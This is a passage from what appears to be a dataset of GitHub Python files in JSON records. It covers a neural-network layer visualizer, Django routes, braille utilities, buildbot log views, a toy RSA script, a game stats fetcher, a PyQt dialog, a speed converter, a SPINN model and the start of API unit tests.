time\nimport torch\nimport pandas as pd\nimport datashader as ds\nfrom collections import OrderedDict\n\nfrom scipy.interpolate import interp1d, griddata\nfrom layout_calculation import hexes2colors\nfrom openGLviz.net_visualizer import Visualizer\nfrom threading import Thread\nfrom vispy import app, gloo\nimport imageio\nfrom immersions.input_optimization.activation_utilities import ModelActivations, activation_selection_dict\nfrom scripts.create_networks import scalogram_resnet_network_smaller\n\nname = 'immersions_scalogram_resnet_house_smaller'\n\nactivation_shapes_path = 'C:/Users/HEV7RNG/Documents/Immersions/models/immersions_scalogram_resnet_house_smaller/immersions_scalogram_resnet_house_smaller_activation_shapes.p'\nactivations = ModelActivations(activation_shapes_path,\n ignore_time_dimension=True,\n remove_results=True)\n\nglobal current_layer\ncurrent_layer = 'no_layer'\n\ndef write_img():\n global current_layer\n img = gloo.read_pixels(alpha=False)\n imageio.imwrite(name + '_' + current_layer + '.png', img)\n\nviz = Visualizer(node_positions=np.random.rand(1, 0, 2).astype(np.float32),\n animate=False,\n edge_textures=np.zeros((1, 800, 800)).astype(np.float32),\n size=(1200, 1200),\n 
draw_callback=write_img)\nviz.min_node_radius = 0.002\nviz.node_radius_factor = 0.002\nviz.animate = False\nviz.node_alpha_factor = 2.\n#viz.edges_colors = hexes2colors(['#000000', '#3f34a0', '#334f9a', '#337294', '#338e8c'])\nviz.edges_colors = hexes2colors(['#000000', '#ffffff'])\nviz.node_colors = hexes2colors(['#ffffff'])\n\nwindow = qtpy.QtWidgets.QMainWindow()\nwindow.setFixedSize(1500, 1500)\nwindow.setCentralWidget(viz.native)\n\npositions = np.load(\n 'C:/Users/HEV7RNG/Documents/Immersions/models/immersions_scalogram_resnet_house_smaller/immersions_scalogram_resnet_house_smaller_layout_positions.npy')\nposition_min = positions.min()\nposition_max = positions.max()\npositions = (positions - position_min) / (position_max - position_min)\n\nnet = scalogram_resnet_network_smaller()\n\ncanvas = ds.Canvas(plot_width=800, plot_height=800,\n x_range=(0,1), y_range=(0,1),\n x_axis_type='linear', y_axis_type='linear')\n\nlayers = ['scalogram',\n 'scalogram_block_0_main_conv_1',\n 'scalogram_block_0_main_conv_2',\n 'scalogram_block_1_main_conv_1',\n 'scalogram_block_1_main_conv_2',\n 'scalogram_block_2_main_conv_1',\n 'scalogram_block_2_main_conv_2',\n 'scalogram_block_3_main_conv_1',\n 'scalogram_block_3_main_conv_2',\n 'scalogram_block_4_main_conv_1',\n 'scalogram_block_4_main_conv_2',\n 'scalogram_block_5_main_conv_1',\n 'scalogram_block_5_main_conv_2',\n 'scalogram_block_6_main_conv_1',\n 'scalogram_block_6_main_conv_2',\n 'scalogram_block_7_main_conv_1',\n 'scalogram_block_7_main_conv_2',\n 'ar_block_0',\n 'ar_block_1',\n 'ar_block_2',\n 'ar_block_3',\n 'ar_block_4',\n 'ar_block_5',\n 'ar_block_6',\n 'ar_block_7',\n 'ar_block_8',\n 'prediction']\n\ndef visualize_layers():\n global current_layer\n\n current_layer = 'connections'\n\n print(\"calc connections\")\n edges = torch.FloatTensor(net.num_connections*3, 3)\n edges[0::3, :2] = torch.from_numpy(positions[net.connections[:, 0], :])\n edges[1::3, :2] = torch.from_numpy(positions[net.connections[:, 1], :])\n edges[2::3, :] = float('nan')\n edges[0::3, 2] = 1. #current_weights[net.connections[:, 0]]\n edges[1::3, 2] = 1. 
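# --- [Editor's aside, not part of the original record] ---------------------
# The float('nan') rows interleaved into `edges` above are how datashader's
# Canvas.line is told to lift the pen: NaN vertices split one long polyline
# into independent edge segments. Coordinates below are toy values:
import numpy as np
import pandas as pd
segs = pd.DataFrame({'x': [0.1, 0.9, np.nan, 0.2, 0.8],
                     'y': [0.1, 0.9, np.nan, 0.8, 0.2],
                     'val': [1.0, 1.0, np.nan, 1.0, 1.0]})
# canvas.line(segs, 'x', 'y', agg=ds.sum('val')) then rasterizes two
# disconnected edges instead of one three-segment path.
# ---------------------------------------------------------------------------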
#current_weights[net.connections[:, 1]]\n    edges = pd.DataFrame(data=edges.numpy())\n    edges.columns = ['x', 'y', 'val']\n    edges_lines = canvas.line(edges, 'x', 'y', agg=ds.sum('val')).values.astype(np.float32)\n    edges_lines[edges_lines != edges_lines] = 0.\n    edges_lines = pow(edges_lines / edges_lines.max(), 0.25)\n    viz.edge_textures = edges_lines[np.newaxis, :, :]\n    viz.update()\n\n    viz.edge_textures = edges_lines[np.newaxis, :, :] * 0.\n\n    for layer in layers:\n        time.sleep(1)\n        current_layer = layer\n        activation_selection_dict = {\n            'layer': current_layer,\n            'channel': 0.,\n            'channel_region': 1.,\n            'pitch': 0.,\n            'pitch_region': 1.,\n            'time': 0.,\n            'time_region': 1.,\n            'keep_selection': 0.\n        }\n        activations.select_activations(activation_selection_dict)\n\n        layer_positions = positions[activations.focus]\n        viz.set_new_node_positions(layer_positions[None, :])\n        viz.update()\n\n\nviz_thread = Thread(target=visualize_layers, daemon=True)\nviz_thread.start()\n\n\nwindow.show()\napp.run()","repo_name":"vincentherrmann/pytorch-graph-visualization","sub_path":"scripts/visualize_focused_layers.py","file_name":"visualize_focused_layers.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"70800115114","text":"from django.conf.urls import url, include\nfrom django.contrib.auth import views as auth_views\nfrom exegesis import views\n\nurlpatterns = [\n    url(r'^login/$', views.login, name='login'),\n    url(r'^logout/$', auth_views.logout, name='logout'),\n    url(r'^auth/', include('social_django.urls', namespace='social')),\n    url(r'^projects/$', views.projects, name='projects'),\n    url(r'^create_project/', views.create_project),\n    url(r'^artboards/', views.artboards),\n    url(r'^svg_images/', views.svg_images),\n    url(r'^svg/', views.index),\n    url(r'^update_artboard/', views.update_artboard),\n    url(r'^delete_artboard/', views.delete_artboard),\n    url(r'^rename_artboard/', views.rename_artboard),\n    url(r'^delete_project/', views.delete_project),\n    url(r'^share_project/', views.share_project),\n    # url(r'^download_artboard/', views.download_artboard),\n    url(r'^revisions/', views.revisions),\n    url(r'^write_note/', views.write_note),\n]\n","repo_name":"gokulnathgm/annotator","sub_path":"exegesis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"17243289177","text":"#!/usr/bin/env python3\n\"\"\"Utilities to read and write unicode code point to braille cell mappings.\"\"\"\n\nimport argparse\nimport json\n\n\ndef print_all_braille_unicode(file_out=\"braille_from_english-map.json\"):\n    \"\"\"Print all 6-dot braille cells as a json object.\n\n    Output:\n      { \"10240\": \"⠀\", ..., \"10303\": \"⠿\" }\n    \"\"\"\n    with open(file_out, \"w\", encoding=\"utf8\") as file:\n        u_to_d = {f\"{i}\": chr(i) for i in range(0x2800, 0x2840)}\n        x = json.dump(u_to_d, file, indent=2, ensure_ascii=False)\n\n\ndef convert_braille_dict_to_array(file_in=\"braille_from_english-map.json\",\n                                  file_out=\"braille_from_english-array.json\"):\n    \"\"\"Print a json array of objects mapping braille to english.\n\n    Output:\n      [ {\"braille\": \"⠁\", \"english\": \"a\"},\n        {\"braille\": \"⠃\", \"english\": \"b\"},\n        ...\n      ]\n    \"\"\"\n    with open(file_in, \"r\", encoding=\"utf8\") as file:\n        e_to_u = json.load(file)\n    a = [{\"braille\": v, \"english\": k} for k, v in e_to_u.items()]\n    with open(file_out, \"w\", encoding=\"utf8\") as file:\n        x = json.dump(a, file, indent=2, ensure_ascii=False)\n\n\ndef reorder_braille_array(file_in=\"braille_from_english-array.json\",\n                          file_out=\"braille_map.json\"):\n    \"\"\"Sort a json array of braille-to-english objects by code point.\n\n    Output:\n      [ {\"braille\": \"⠀\", \"english\": \" \"},\n        {\"braille\": \"⠁\", \"english\": \"a\"},\n        {\"braille\": \"⠂\", \"english\": \"(ea)\"},\n        ...\n      ]\n    \"\"\"\n    with open(file_in, \"r\", encoding=\"utf8\") as file:\n        cells = json.load(file)\n    cells.sort(key=lambda x: x[\"braille\"])\n    with open(file_out, \"w\", encoding=\"utf8\") as file:\n        x = json.dump(cells, file, indent=2, ensure_ascii=False)\n\n\nif __name__ == \"__main__\":\n    # print_all_braille_unicode()\n    # convert_braille_dict_to_array()\n    reorder_braille_array()\n","repo_name":"mbdeaton/bref","sub_path":"support/brailler.py","file_name":"brailler.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"15457947031","text":"from zope.interface import implements\nfrom twisted.python import components\nfrom twisted.spread import pb\nfrom twisted.web import server\nfrom twisted.web.resource import Resource\nfrom twisted.web.error import NoResource\n\nfrom buildbot import interfaces\nfrom buildbot.status import logfile\nfrom buildbot.status.web.base import IHTMLLog, HtmlResource, path_to_root\nfrom buildbot.util.ansicodes import parse_ansi_sgr\n\nclass ChunkConsumer:\n    implements(interfaces.IStatusLogConsumer)\n\n    def __init__(self, original, textlog):\n        self.original = original\n        self.textlog = textlog\n    def registerProducer(self, producer, streaming):\n        self.producer = producer\n        self.original.registerProducer(producer, streaming)\n    def unregisterProducer(self):\n        self.original.unregisterProducer()\n    def writeChunk(self, chunk):\n        formatted = self.textlog.content([chunk])\n        try:\n            if isinstance(formatted, unicode):\n                formatted = formatted.encode('utf-8')\n            self.original.write(formatted)\n        except pb.DeadReferenceError:\n            self.producer.stopProducing()  # was self.producing, an attribute that is never set\n    def finish(self):\n        self.textlog.finished()\n\n# /builders/$builder/builds/$buildnum/steps/$stepname/logs/$logname\nclass TextLog(Resource):\n    # a new instance of this Resource is created for each client who views\n    # it, so we can afford to track the request in the Resource.\n    implements(IHTMLLog)\n\n    asText = False\n    subscribed = False\n\n    def __init__(self, original):\n        Resource.__init__(self)\n        self.original = original\n\n    def getChild(self, path, req):\n        if path == \"text\":\n            self.asText = True\n            return self\n        return Resource.getChild(self, path, req)\n\n    def content(self, entries):\n        html_entries = []\n        text_data = ''\n        for type, entry in entries:\n            if type >= len(logfile.ChunkTypes) or type < 0:\n                # non-std channel, don't display\n                continue\n\n            is_header = type == logfile.HEADER\n\n            if not self.asText:\n                # jinja only works with unicode, or pure ascii, so assume utf-8 in logs\n                if not isinstance(entry, unicode):\n                    entry = unicode(entry, 'utf-8', 'replace')\n                first_entry = True\n                _type = logfile.ChunkTypes[type]\n                for ansi_entry in entry.split(\"\\033[\"):\n                    code = \"\"\n                    if not first_entry:\n\n                        ansi_entry, ansi_classes = parse_ansi_sgr(ansi_entry)\n                        if ansi_classes:\n                            code = \"\".join([\" ansi\" + i for i in ansi_classes])\n\n                    html_entries.append(dict(type=_type + code,\n                                             text=ansi_entry,\n                                             is_header=is_header))\n                    first_entry = False\n\n            elif not is_header:\n                text_data += entry\n\n        if self.asText:\n            return 
text_data\n else:\n return self.template.module.chunks(html_entries)\n\n def render_HEAD(self, req):\n self._setContentType(req)\n\n # vague approximation, ignores markup\n req.setHeader(\"content-length\", self.original.length)\n return ''\n\n def render_GET(self, req):\n self._setContentType(req)\n self.req = req\n\n if not self.asText:\n self.template = req.site.buildbot_service.templates.get_template(\"logs.html\") \n \n data = self.template.module.page_header(\n pageTitle = \"Log File contents\",\n texturl = req.childLink(\"text\"),\n path_to_root = path_to_root(req))\n data = data.encode('utf-8') \n req.write(data)\n\n self.original.subscribeConsumer(ChunkConsumer(req, self))\n return server.NOT_DONE_YET\n\n def _setContentType(self, req):\n if self.asText:\n req.setHeader(\"content-type\", \"text/plain; charset=utf-8\")\n else:\n req.setHeader(\"content-type\", \"text/html; charset=utf-8\")\n \n def finished(self):\n if not self.req:\n return\n try:\n if not self.asText:\n data = self.template.module.page_footer()\n data = data.encode('utf-8')\n self.req.write(data)\n self.req.finish()\n except pb.DeadReferenceError:\n pass\n # break the cycle, the Request's .notifications list includes the\n # Deferred (from req.notifyFinish) that's pointing at us.\n self.req = None\n \n # release template\n self.template = None\n\ncomponents.registerAdapter(TextLog, interfaces.IStatusLog, IHTMLLog)\n\n\nclass HTMLLog(Resource):\n implements(IHTMLLog)\n\n def __init__(self, original):\n Resource.__init__(self)\n self.original = original\n\n def render(self, request):\n request.setHeader(\"content-type\", \"text/html\")\n return self.original.html\n\ncomponents.registerAdapter(HTMLLog, logfile.HTMLLogFile, IHTMLLog)\n\n\nclass LogsResource(HtmlResource):\n addSlash = True\n\n def __init__(self, step_status):\n HtmlResource.__init__(self)\n self.step_status = step_status\n\n def getChild(self, path, req):\n for log in self.step_status.getLogs():\n if path == log.getName():\n if log.hasContents():\n return IHTMLLog(interfaces.IStatusLog(log))\n return NoResource(\"Empty Log '%s'\" % path)\n return HtmlResource.getChild(self, path, req)\n","repo_name":"houseoflifeproperty/bitpop","sub_path":"build/third_party/buildbot_8_4p1/buildbot/status/web/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"23201927102","text":"\n\ndef encrypt_list(msg, n, e):\n return [((c + 100) ** e) % n for c in msg.encode('ASCII')]\n\ndef decrypt_list(cipher_list, n, d):\n codes = [((c ** d) % n) - 100 for c in cipher_list]\n msg = bytes(codes).decode('ASCII')\n return msg\n \n\ndef encrypt(msg, n, e):\n digits = int(''.join([str(c + 100) for c in msg.encode('ASCII')]))\n print(digits)\n cipher_text = (digits ** e) % n\n return cipher_text\n\n\ndef decrypt(cipher_text, n, d):\n t1 = str((cipher_text ** d) % n)\n print(t1)\n codes = [int(t1[n:n+3]) - 100 for n in range(0, len(t1), 3)]\n print(codes)\n msg = bytes(codes).decode('ASCII')\n return msg\n\n\nwith open('keys.txt', 'r') as keys:\n n, e, d = tuple(int(key[:-1]) for key in list(keys))\n\nprint('n = %d\\ne = %d\\nd = %d' % (n, e, d))\n\nmsg = input('enter message: ')\ncode = encrypt(msg, n, e)\nprint('encrypted message: ')\nprint(code)\ndecrypted = decrypt(code, n, d)\nprint('decrypted message: %s' % 
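# --- [Editor's aside, not part of the original record] ---------------------
# (cipher_text ** d) % n in decrypt() above first materializes a gigantic
# integer; Python's three-argument pow() reduces modulo n at every step and
# is the practical way to do RSA-sized modular exponentiation:
assert pow(7, 128, 13) == (7 ** 128) % 13
# i.e. prefer pow(c, d, n) over (c ** d) % n in encrypt()/decrypt().
# ---------------------------------------------------------------------------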
decrypted)\n","repo_name":"rbridges12/rsa-encryption","sub_path":"encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23011020392","text":"import re\nimport requests\nfrom functools import lru_cache\n\nGAME_DATA_ENDPOINT = 'https://127.0.0.1:2999/liveclientdata/allgamedata'\nCHAMPION_INFO_ENDPOINT = 'https://raw.communitydragon.org/latest/game/data/characters/{champion}/{champion}.bin.json'\nDEFAULT_RADIUS = 65.\nDEFAULT_WINDUP = 0.3\n\n\ndef clean_champion_name(name):\n return name.split('game_character_displayname_')[1].lower()\n\n\nclass ChampionStats():\n def __init__(self):\n game_data = requests.get(GAME_DATA_ENDPOINT, verify=False).json()\n champion_names = [clean_champion_name(player['rawChampionName']) for player in game_data['allPlayers']]\n self.champion_data = {}\n for champion in champion_names:\n champion_response = requests.get(CHAMPION_INFO_ENDPOINT.format(champion=champion)).json()\n # lower case everything for consistency\n self.champion_data[champion] = {k.lower(): v for k, v in champion_response.items()}\n\n @lru_cache(maxsize=None)\n def get_attack_speed(self, target):\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n attack_speed_base = self.champion_data[target.lower()][root_key]['attackSpeed']\n attack_speed_ratio = self.champion_data[target.lower()][root_key]['attackSpeedRatio']\n return attack_speed_base, attack_speed_ratio\n\n @lru_cache(maxsize=None)\n def get_windup(self, target):\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n basic_attack = self.champion_data[target.lower()][root_key]['basicAttack']\n windup_percent = 0.3\n windup_modifier = 0.\n if 'mAttackDelayCastOffsetPercent' in basic_attack:\n windup_percent = basic_attack['mAttackDelayCastOffsetPercent'] + DEFAULT_WINDUP\n if 'mAttackDelayCastOffsetPercentAttackSpeedRatio' in basic_attack:\n windup_modifier = basic_attack['mAttackDelayCastOffsetPercentAttackSpeedRatio']\n print(\"Windup percent: {}\".format(windup_percent))\n print(\"Windup modifier: {}\".format(windup_modifier))\n return windup_percent, windup_modifier\n\n @lru_cache(maxsize=None)\n def get_radius(self, target):\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n return self.champion_data[target.lower()][root_key].get('overrideGameplayCollisionRadius', DEFAULT_RADIUS)\n\n def names(self):\n return self.champion_data.keys()\n\n @lru_cache(maxsize=None)\n def get_spells(self, target):\n # castRange, castFrame, mDataValues\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n return [\n self.champion_data[target.lower()]['characters/{}/spells/{}'.format(target.lower(), spell.lower())]['mSpell']\n for spell in self.champion_data[target.lower()][root_key]['spellNames']\n ]\n\n @lru_cache(maxsize=None)\n def is_melee(self, target):\n root_key = 'characters/{}/characterrecords/root'.format(target.lower())\n identities = self.champion_data[target.lower()][root_key]['purchaseIdentities']\n return any(identity for identity in identities if identity == 'Melee')\n","repo_name":"hrt/Lmeme","sub_path":"champion_stats.py","file_name":"champion_stats.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"} +{"seq_id":"7014209277","text":"import sys\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import 
*\n\n\nclass QuestionMessageBox(QMessageBox):\n def __init__(self, parent, title, content):\n super(QuestionMessageBox, self).__init__(parent)\n self.setWindowTitle(title)\n self.setText(content)\n self.setIcon(QMessageBox.Question)\n\n self.addButton('是', QMessageBox.YesRole)\n self.addButton('否', QMessageBox.NoRole)\n\n\nclass Window(QWidget):\n def __init__(self):\n super(Window, self).__init__()\n self.button = QPushButton('点我')\n self.button.clicked.connect(self.change_text)\n\n h_layout = QHBoxLayout()\n h_layout.addWidget(self.button)\n self.setLayout(h_layout)\n\n def change_text(self): # 1\n msb_box = QuestionMessageBox(self, '标题', '是否改变文本?')\n msb_box.exec()\n\n if msb_box.clickedButton().text() == '是':\n self.button.setText('文本改变')\n\n\nif __name__ == '__main__':\n app = QApplication([])\n window = Window()\n window.show()\n sys.exit(app.exec())","repo_name":"la-vie-est-belle/book-codes","sub_path":"第2章/示例代码2-7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8391368228","text":"print(\"Welocome to the MPH to MPS conversion app\\n\")\r\n'''\r\nconversion\r\n1 mile = 1.6093 km\r\n1 km = 1000 m\r\n1 mile = 1,609.3 m\r\n1 hr = 60 min * 60 secs = 3600 secs\r\nmultiplying factor = 1,609.3/3600 = 0.447027778\r\n'''\r\n\r\nspeed_mph = float(input('Enter your speed in Miles per Hour (mph): '))\r\n\r\nspeed_mps = speed_mph*0.4470277778\r\n\r\nrounded_speed = round(speed_mps, 2)\r\nprint(f'Your speed is {rounded_speed} m/s')\r\n","repo_name":"vaylon-fernandes/simple-python-projects","sub_path":"mph_to_ms/mph_to_ms.py","file_name":"mph_to_ms.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16390212164","text":"import itertools\nimport copy\n\nimport numpy as np\nfrom spinn import util\n\n# PyTorch\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom spinn.util.blocks import Reduce\nfrom spinn.util.blocks import LSTMState, Embed, MLP\nfrom spinn.util.blocks import bundle, unbundle, to_cpu, to_gpu, treelstm, lstm\nfrom spinn.util.blocks import get_h, get_c, get_seq_h\nfrom spinn.util.misc import Args, Vocab, Example\n\nfrom spinn.fat_stack import BaseModel as _BaseModel\nfrom spinn.fat_stack import SPINN\n\nfrom spinn.data import T_SHIFT, T_REDUCE, T_SKIP, T_STRUCT\n\n\ndef build_model(data_manager, initial_embeddings, vocab_size, num_classes, FLAGS):\n model_cls = BaseModel\n use_sentence_pair = data_manager.SENTENCE_PAIR_DATA\n\n return model_cls(model_dim=FLAGS.model_dim,\n word_embedding_dim=FLAGS.word_embedding_dim,\n vocab_size=vocab_size,\n initial_embeddings=initial_embeddings,\n num_classes=num_classes,\n mlp_dim=FLAGS.mlp_dim,\n embedding_keep_rate=FLAGS.embedding_keep_rate,\n classifier_keep_rate=FLAGS.semantic_classifier_keep_rate,\n tracking_lstm_hidden_dim=FLAGS.tracking_lstm_hidden_dim,\n transition_weight=FLAGS.transition_weight,\n encode_style=FLAGS.encode_style,\n encode_reverse=FLAGS.encode_reverse,\n encode_bidirectional=FLAGS.encode_bidirectional,\n encode_num_layers=FLAGS.encode_num_layers,\n use_sentence_pair=use_sentence_pair,\n lateral_tracking=FLAGS.lateral_tracking,\n use_tracking_in_composition=FLAGS.use_tracking_in_composition,\n predict_use_cell=FLAGS.predict_use_cell,\n use_lengths=FLAGS.use_lengths,\n 
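For the MPH-to-m/s converter above, the hard-coded 0.4470277778 comes from 1 mile = 1,609.3 m over 3,600 s; the exact international mile (1,609.344 m) gives the conventional 0.44704. A self-contained check deriving the factor instead of hard-coding it:

METERS_PER_MILE = 1609.344   # international mile; the sample rounds to 1609.3
SECONDS_PER_HOUR = 60 * 60
MPH_TO_MPS = METERS_PER_MILE / SECONDS_PER_HOUR  # ~0.44704

speed_mph = 55.0
print(f"{speed_mph} mph = {speed_mph * MPH_TO_MPS:.2f} m/s")  # 24.59 m/s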
use_difference_feature=FLAGS.use_difference_feature,\n use_product_feature=FLAGS.use_product_feature,\n num_mlp_layers=FLAGS.num_mlp_layers,\n mlp_bn=FLAGS.mlp_bn,\n gen_h=FLAGS.gen_h,\n )\n\n\nclass GenSPINN(SPINN):\n\n def __init__(self, args, vocab, predict_use_cell, use_lengths):\n super(GenSPINN, self).__init__(args, vocab, predict_use_cell, use_lengths)\n\n vocab_size = vocab.vectors.shape[0]\n self.inp_dim = args.size\n\n # TODO: This can be a hyperparam. Use input dim for now.\n self.decoder_dim = self.inp_dim\n\n # TODO: Include additional features for decoder, such as\n # top of the stack or tracker state.\n features_dim = self.decoder_dim\n\n self.decoder_rnn = nn.LSTM(self.inp_dim, self.decoder_dim,\n num_layers=1,\n batch_first=True,\n bidirectional=False,\n )\n\n self.decoder = nn.Linear(self.decoder_dim, vocab_size)\n\n def reset_decoder(self, example):\n \"\"\"Run decoder on input to initialize rnn states.\"\"\"\n batch_size = len(example.bufs)\n\n # TODO: Would prefer to run decoder forwards or backwards?\n batch = torch.cat([torch.cat(b, 0).unsqueeze(0) for b in example.bufs], 0)\n\n init = to_gpu(Variable(torch.zeros(1, batch_size, self.decoder_dim), volatile=not self.training))\n self.dec_h = list(torch.chunk(init, batch_size, 1))\n self.dec_c = list(torch.chunk(init, batch_size, 1))\n\n # TODO: Right now the decoder runs over the entire sentence, which is a bit like cheating!\n self.run_decoder_rnn(range(batch_size), batch)\n\n def run_decoder_rnn(self, idxs, x):\n x = get_seq_h(x, self.inp_dim)\n batch_size, seq_len, inp_dim = x.size()\n\n h_prev = torch.cat([self.dec_h[batch_idx] for batch_idx in idxs], 1)\n c_prev = torch.cat([self.dec_c[batch_idx] for batch_idx in idxs], 1)\n\n # Expects (input, h_0, c_0):\n # input => batch_size x seq_len x inp_dim\n # h_0 => (num_layers x bi[1,2]) x batch_size x model_dim\n # c_0 => (num_layers x bi[1,2]) x batch_size x model_dim\n output, (hn, cn) = self.decoder_rnn(x, (h_prev, c_prev))\n\n h_parts = torch.chunk(hn, batch_size, 1)\n c_parts = torch.chunk(cn, batch_size, 1)\n for i, batch_idx in enumerate(idxs):\n self.dec_h[batch_idx] = h_parts[i]\n self.dec_c[batch_idx] = c_parts[i]\n\n return hn, cn\n\n def shift_phase(self, tops, trackings, stacks, idxs):\n \"\"\"SHIFT: Should dequeue buffer and item to stack.\"\"\"\n\n # Generative Component.\n if len(stacks) > 0:\n h_prev = torch.cat([self.dec_h[batch_idx] for batch_idx in idxs], 1)\n c_prev = torch.cat([self.dec_h[batch_idx] for batch_idx in idxs], 1)\n\n if self.training:\n # First predict, then run one step of RNN in preparation for next decode.\n w = self.decoder(h_prev.squeeze(0))\n logits = F.log_softmax(w)\n target = np.array([self.tokens[batch_idx].pop() for batch_idx in idxs])\n\n self.memory['gen_logits'] = logits\n self.memory['gen_target'] = target\n\n # Run decoder one step in preparation for next shift phase.\n self.run_decoder_rnn(idxs, torch.cat(tops, 0).unsqueeze(1))\n\n # TODO: Experiment adding the predicted the word to the stack rather than\n # the top of the buffer.\n\n if len(stacks) > 0:\n shift_candidates = iter(tops)\n for stack in stacks:\n new_stack_item = next(shift_candidates)\n stack.append(new_stack_item)\n\n def loss_phase_hook(self):\n if self.training:\n target = np.array(reduce(lambda x, y: x + y.tolist(),\n [m[\"gen_target\"] for m in self.memories if \"gen_target\" in m], []))\n logits = torch.cat([m[\"gen_logits\"] for m in self.memories if \"gen_logits\" in m], 0)\n\n # TODO: Probably only the first or last words have any chance of 
being predicted.\n # Calculate loss.\n target = torch.from_numpy(target).long()\n self.gen_loss = nn.NLLLoss()(logits, Variable(target, volatile=not self.training)) / target.size(0)\n\n # Calculate accuracy.\n pred = logits.data.max(1)[1].cpu() # get the index of the max log-probability\n self.gen_acc = pred.eq(target).sum() / float(target.size(0))\n\n def forward(self, example, use_internal_parser=False, validate_transitions=True):\n tokens = example.tokens.data.numpy().tolist()\n tokens = [list(reversed(t)) for t in tokens]\n self.tokens = tokens\n\n self.reset_decoder(example)\n\n return super(GenSPINN, self).forward(\n example, use_internal_parser=use_internal_parser, validate_transitions=validate_transitions)\n\n\nclass BaseModel(_BaseModel):\n\n def __init__(self, gen_h=None, **kwargs):\n self.gen_h = gen_h\n super(BaseModel, self).__init__(**kwargs)\n\n def build_spinn(self, args, vocab, predict_use_cell, use_lengths):\n return GenSPINN(args, vocab, predict_use_cell, use_lengths)\n\n def output_hook(self, output, sentences, transitions, y_batch=None):\n pass\n\n def get_features_dim(self):\n features_dim = super(BaseModel, self).get_features_dim()\n if self.gen_h:\n features_dim += self.spinn.decoder_dim\n return features_dim\n\n def build_features(self, h):\n features = super(BaseModel, self).build_features(h)\n if self.gen_h:\n decoder_h = torch.cat(self.spinn.dec_h, 0).squeeze()\n features = torch.cat([features, decoder_h], 1)\n return features\n","repo_name":"woojinchung/lms","sub_path":"python/spinn/gen_spinn.py","file_name":"gen_spinn.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"27703827800","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 接口自动化测试.py\n# @Author: huifer\n# @Date : 2018-3-6\nimport json\n\nimport requests\nimport unittest\nfrom urllib import parse\n\n\n# url = \"http://127.0.0.1:8060/api/v1.0/\"\n# ins = parse.urljoin(url, 'getall')\n# print(ins)\n# r = requests.get(ins)\n# print(r.json()['status'])\n\n\nclass GetEventListTest(unittest.TestCase):\n def setUp(self):\n self.url = \"http://127.0.0.1:8060/api/v1.0/\"\n\n @unittest.skip('暂时test_get_data_all的测试')\n def test_get_data_all(self):\n \"\"\"查询所有\"\"\"\n ins = parse.urljoin(self.url, 'getall')\n r = requests.get(ins)\n result = r.json()\n self.assertEqual(result['status']['code'], 200)\n self.assertEqual(result['status']['message'], \"OK\")\n\n @unittest.skip('暂时test_get_data_one的测试')\n def test_get_data_one(self):\n ins = parse.urljoin(self.url, 'getid/2')\n r = requests.get(ins)\n result = r.json()\n self.assertEqual(result['status']['code'], 200)\n self.assertEqual(result['status']['message'], \"OK\")\n self.assertEqual(result['data']['description'], \"Need to find a good Python tutorial on the web\")\n self.assertEqual(result['data']['done'], False)\n self.assertEqual(result['data']['id'], 2)\n self.assertEqual(result['data']['title'], \"Learn Python\")\n\n @unittest.skip('暂时跳过test_del_one用例2的测试')\n def test_del_one(self):\n ins = parse.urljoin(self.url, 'delone/1')\n r = requests.delete(ins)\n result = r.json()\n self.assertEqual(result['status']['code'], 204)\n self.assertEqual(result['status']['message'], \"NO CONTENT\")\n\n @unittest.skip('暂时跳过test_create_one用例2的测试')\n def test_create_one(self):\n ins = parse.urljoin(self.url, 'create')\n payload = {u\"title\": 123}\n headers = {'Content-Type': 'application/json',\n 'accept': \"application/json\"\n }\n\n r = 
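One likely bug in the GenSPINN sample above: in `shift_phase`, `c_prev` is concatenated from `self.dec_h` rather than `self.dec_c`, so the decoder LSTM's cell state is silently replaced by its hidden state. A corrected excerpt, assuming the intent mirrors `run_decoder_rnn` in the same class:

# inside GenSPINN.shift_phase, mirroring run_decoder_rnn above
h_prev = torch.cat([self.dec_h[batch_idx] for batch_idx in idxs], 1)
c_prev = torch.cat([self.dec_c[batch_idx] for batch_idx in idxs], 1)  # was dec_h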
